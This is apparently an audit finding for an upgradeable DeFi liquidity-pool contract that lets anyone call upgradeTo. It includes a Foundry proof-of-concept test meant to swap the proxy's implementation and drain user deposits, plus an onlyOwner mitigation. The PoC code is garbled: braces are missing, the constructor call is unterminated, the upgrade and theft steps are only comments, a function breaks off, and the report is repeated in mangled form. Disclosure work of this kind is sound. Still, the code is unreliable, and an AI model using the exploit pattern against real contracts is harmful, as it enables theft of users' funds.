The WellUpgradeable contract has a critical security vulnerability that allows any user to call the upgradeTo and upgradeToAndCall functions without any restrictions. This flaw enables an attacker to replace the contract's implementation with a malicious contract, potentially gaining control over the contract’s logic, including the ability to drain all user-deposited tokens from the pool.
Since the WellUpgradeable contract is designed to manage user funds within a liquidity pool, the consequences of this exploit are severe. An attacker could create a custom implementation that adds malicious functions, such as transferring all tokens to the attacker's address, effectively stealing all assets held by the contract. Moreover, the attacker could further manipulate the contract to seize ownership, allowing them to make additional unauthorized changes.
Proof of Concept
re-paste this into thetest/WellUpgradeable.t.sol file at the testing suit offered by the protocol:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
import {Test, console} from "forge-std/Test.sol";
import {WellUpgradeable} from "src/WellUpgradeable.sol";
import {IERC20} from "test/TestHelper.sol";
import {WellDeployer} from "script/helpers/WellDeployer.sol";
import {MockPump} from "mocks/pumps/MockPump.sol";
import {Well, Call, IWellFunction, IPump, IERC20} from "src/Well.sol";
import {ConstantProduct2} from "src/functions/ConstantProduct2.sol";
import {Aquifer} from "src/Aquifer.sol";
import {WellDeployer} from "script/helpers/WellDeployer.sol";
import {LibWellUpgradeableConstructor} from "src/libraries/LibWellUpgradeableConstructor.sol";
import {MockToken} from "mocks/tokens/MockToken.sol";
import {WellDeployer} from "script/helpers/WellDeployer.sol";
import {ERC1967Proxy} from "oz/proxy/ERC1967/ERC1967Proxy.sol";
import {MockWellUpgradeable} from "mocks/wells/MockWellUpgradeable.sol";
contract WellUpgradeTestWalter is Test, WellDeployer {
address proxyAddress;
address aquifer;
address initialOwner;
address user;
address mockPumpAddress;
address wellFunctionAddress;
address token1Address;
address token2Address;
address wellAddress;
IERC20[] tokens = new IERC20[](2);
address wellImplementation;
address attacker = address(404);
function setUp() public {
// Tokens
tokens[0] = new MockToken("BEAN", "BEAN", 6);
tokens[1] = new MockToken("WETH", "WETH", 18);
token1Address = address(tokens[0]);
vm.label(token1Address, "token1");
token2Address = address(tokens[1]);
vm.label(token2Address, "token2");
user = makeAddr("user");
// Mint tokens
MockToken(address(tokens[0])).mint(user, 10_000_000_000_000_000);
MockToken(address(tokens[1])).mint(user, 10_000_000_000_000_000);
// Well Function
IWellFunction cp2 = new ConstantProduct2();
vm.label(address(cp2), "CP2");
wellFunctionAddress = address(cp2);
Call memory wellFunction = Call(address(cp2), abi.encode("beanstalkFunction"));
// Pump
IPump mockPump = new MockPump();
mockPumpAddress = address(mockPump);
vm.label(mockPumpAddress, "mockPump");
Call[] memory pumps = new Call[](1);
// init new mock pump with "beanstalk" data
pumps[0] = Call(address(mockPump), abi.encode("beanstalkPump"));
aquifer = address(new Aquifer());
vm.label(aquifer, "aquifer");
wellImplementation = address(new WellUpgradeable());
vm.label(wellImplementation, "wellImplementation");
initialOwner = makeAddr("owner");
// Well
WellUpgradeable well =
encodeAndBoreWellUpgradeable(aquifer, wellImplementation, tokens, wellFunction, pumps, bytes32(0));
wellAddress = address(well);
vm.label(wellAddress, "upgradeableWell");
ERC1967Proxy proxy = new ERC1967Proxy(
address(well), // implementation address
LibWellUpgradeableConstructor.encodeWellInitFunctionCall(tokens, wellFunction) // init data
proxyAddress = address(proxy);
vm.label(proxyAddress, "proxyAddress");
tokens[0].approve(wellAddress, type(uint256).max);
tokens[1].approve(wellAddress, type(uint256).max);
tokens[0].approve(proxyAddress, type(uint256).max);
tokens[1].approve(proxyAddress, type(uint256).max);
function test_POC_Walter() public {
Call memory wellFunction = Call(wellFunctionAddress, abi.encode("2"));
Call[] memory pumps = new Call[](1);
pumps[0] = Call(mockPumpAddress, abi.encode("2"));
// create new mock Well Implementation:
address wellImpl = address(new MockWellUpgradeable2());
WellUpgradeable well2 =
encodeAndBoreWellUpgradeable(aquifer, wellImpl, tokens, wellFunction, pumps, bytes32(abi.encode("2")));
vm.label(address(well2), "upgradeableWell2");
// random user that deposits some funds //
uint256[] memory amounts = new uint256[](2);
amounts[0] = 1_000_000;
amounts[1] = 1_000_000;
WellUpgradeable(proxyAddress).addLiquidity(amounts, 0, user, type(uint256).max);
assertEq(amounts, WellUpgradeable(proxyAddress).getReserves());
// attacker hijack proxy contract with arbitrary implementation //
WellUpgradeable proxy = WellUpgradeable(payable(proxyAddress));
// no need to change the owner,since we want the tokens,but eventually we can even get owner control by inserting new functions in the new implementation
assertEq(initialOwner, MockWellUpgradeable(proxyAddress).owner());
// verify proxy was upgraded, using arbitrary impl contract and that can be upgraded by anyone
assertEq(address(well2), MockWellUpgradeable(proxyAddress).getImplementation());
assertEq(1, MockWellUpgradeable(proxyAddress).getVersion());
assertEq(100, MockWellUpgradeable(proxyAddress).getVersion(100));
// check for new upgraded proxy implementation
// check balance of attacker is 0
// steal every token
// check that the attacker have stolen the tokens
contract MockWellUpgradeable2 is WellUpgradeable {
function getVersion(uint256 i) external pure returns (uint256) {
return i;
function getOutTokens(address token)
run using:
forge test -vvvv --mt test_POC_Walter
Tools Used
Recommended Mitigation Steps
Implement strict access control for the upgradeTo and upgradeToAndCall functions by ensuring that only the contract owner (or another authorized entity) can call these functions. This can be done using modifiers like onlyOwner from OwnableUpgradeable
Lines of code
Vulnerability details
contract has a critical security vulnerability that allows any user to call theupgradeTo
functions without any restrictions. This flaw enables an attacker to replace the contract's implementation with a malicious contract, potentially gaining control over the contract’s logic, including the ability to drain all user-deposited tokens from the pool.Since the
contract is designed to manage user funds within a liquidity pool, the consequences of this exploit are severe. An attacker could create a custom implementation that adds malicious functions, such as transferring all tokens to the attacker's address, effectively stealing all assets held by the contract. Moreover, the attacker could further manipulate the contract to seize ownership, allowing them to make additional unauthorized changes.Proof of Concept
re-paste this into the
file at the testing suit offered by the protocol:run using:
forge test -vvvv --mt test_POC_Walter
Tools Used
Recommended Mitigation Steps
Implement strict access control for the
functions by ensuring that only the contract owner (or another authorized entity) can call these functions. This can be done using modifiers likeonlyOwner
Assessed type
Access Control